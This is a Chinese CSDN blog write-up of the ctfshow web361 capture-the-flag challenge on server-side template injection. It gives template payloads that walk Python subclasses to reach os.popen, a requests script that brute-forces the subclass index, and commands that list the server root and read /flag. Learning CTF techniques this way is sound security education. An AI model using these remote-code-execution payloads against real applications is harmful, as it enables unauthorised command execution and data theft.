ctfshow-web361(SSTI)

最新推荐文章于 2024-04-11 11:38:30 发布
最新推荐文章于 2024-04-11 11:38:30 发布
阅读量581 收藏 2
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124347670
版权

看到Hello,猜测输入的参数是name

?name={{[].__class__.__base__.__subclasses__()}}

 然后应该是要写脚本跑程序找需要的函数(用的别人的,现在还不会写python脚本)

这里利用os._wrap_close类

import requests
from tqdm import tqdm

for i in tqdm(range(233)):
    url = 'http://5e2ef65c-fcb3-4ca5-9502-acab1d21ebc8.challenge.ctf.show/?name={{%22%22.__class__.__bases__[0].__subclasses__()['+str(i)+']}}'
    r = requests.get(url=url).text
    if('os._wrap_close' in r):
        print(i)

输出132

然后开始运用

用__init__.__globals__查找popen(能查到就行,不需要位置)

__globals__:
该属性是函数特有的属性,记录当前文件全局变量的值,如果某个文件调用了os、sys等库,但我们只能访问该文件某个函数或者某个对象,那么我们就可以利用__globals__属性访问全局的变量

所以 __init__.__globals__应该就是要调用全局变量

?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}

这里应该就是调用全局变量中的popen 

os.popen() 方法用于从一个命令打开一个管道。(具体的不是很理解,大概应该就是可以使用命令的意思)

popen方法通过p.read()获取终端输出

?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}

对于借助 open() 函数,并以可读模式(包括 r、r+、rb、rb+)打开的文件,可以调用 read() 函数逐个字节(或者逐个字符)读取文件中的内容。 (可能popen借助了open()函数,不是很清楚)

?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}

?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

 大概能看懂,知道为什么,但是不会用

m0_62094846
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow---web入门---SSTI361-368)
2301_80470992的博客
03-16 426
根据题目给的“名字就是考点”,所以构建playloadstrstrobjectobjectobject[132].__init____init__['popen']popenos.popen。
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1355
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
第二周任务
最新发布
stronelu的博客
04-11 300
首先来看,题目中所说的:“名字就是考点”我们推测用于输入代码的id就是"name"所以,我们先尝试看是否存在ssti漏洞:可以看到,显示的结果为“0”,说明是存在漏洞的,所以我们进一步输入;得到object基类,随后添加__subclasses__来得到所有的子类:这里我们一般会使用popen函数,那么我们就需要先找到存放函数的类在什么地方,通常来说我们可以从"os._wrap_close"中找到,我们可以先将所有子类复制之后,用python来将分割他们的逗号修改为换行符;
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
Jay17的博客
08-10 1268
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
SSTI模板注入漏洞详解(包含ctfshow web入门361)
T1ngSh0w的博客
03-16 1260
服务端接收了攻击者的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了攻击者插入的可以破坏模板的语句,从而达到攻击者的目的。
ctfshow web入门 ssti web361~web372
qq_62989306的博客
09-13 1296
ssti之数字绕过、request绕过、字符串拼接、chr绕过、反弹绕过、dnslog外带、读文件盲注……
web入门361~372SSTI
pandasaymmm的博客
03-18 97
SSTI(Server-Side TemplateInjection)服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的。
【已解决】Python调用adb命令,返回值显示“<os._wrap_close object at 0x039215F0>”
olivia的博客
06-15 748
Python调用adb命令,返回值显示“”
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。 同步更新于: 01月29日更新: 新收录文章 mysql MSSQL postgresql 前端安全 php java-Web redis SSTI 信息搜集 渗透 Web-...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
SSTI练习 web361--web372
qing_chuan_的博客
06-15 193
我一步一步试了试,过滤了几个数字2,3等,正好把我可用的os模块没法用了,上网看了好多大佬们的wp可以用全角数字来代替正常数字。这里要提醒我自己一下,这里到用到use_for,自己在哪里拼了半天就是不对。要寄漏,原来过了单双引号啊,当然要用老方法了,request拼接。用subprocess.Popen(),也不行。这题开始过滤了,过了啥,上一题大佬的脚本仍然可以用。哈哈哈,终于到了{}了,直接{%%}+print。加了args过滤,用cookie就好了。上一题全角数字的不能用了。
SSTI原理以及ctf.show的SSTI(web361-web362)
wanan的博客
09-30 677
SSTI原理以及ctf.show的SSTI(web361-web362)
Python获取CMD命令行输出结果
weixin_44447687的博客
03-26 3228
学Python 用RPA, 艺赛旗RPA 2020.1全新首发免费下载 点击下载 www.i-search.com.cn/index.html?from=line1 一,os.system() 这种方式虽然可以在控制台看到回显的结果,但是却无法接收到这些内容,更无法对结果进行处理 官方文档对返回结果说明如下 在Windows上,返回值是运行命令后系统外壳程序返回的值。…通常是cmd.exe,它返回...
Web】Ctfshow SSTI刷题记录1
uuzeray的博客
11-19 1204
题目给到Hint,尝试传?name={{1-1}}测试出ssti注入点。使用{%%}绕过,再借助print()回显。
CTFSHOW SSTI
m0_64180167的博客
09-30 218
这里可以使用自定义的变量来绕过 request.values.a 类似于自己定义的变量只需要在}}后面传递参数即可这里是我们需要跑的脚本类型我们需要找到popen来执行命令 我们就可以通过遍历类 然后通过__getitem__找到方法request然后来查询popen写个脚本name="print(i)else:continue跑出来132。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8286
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值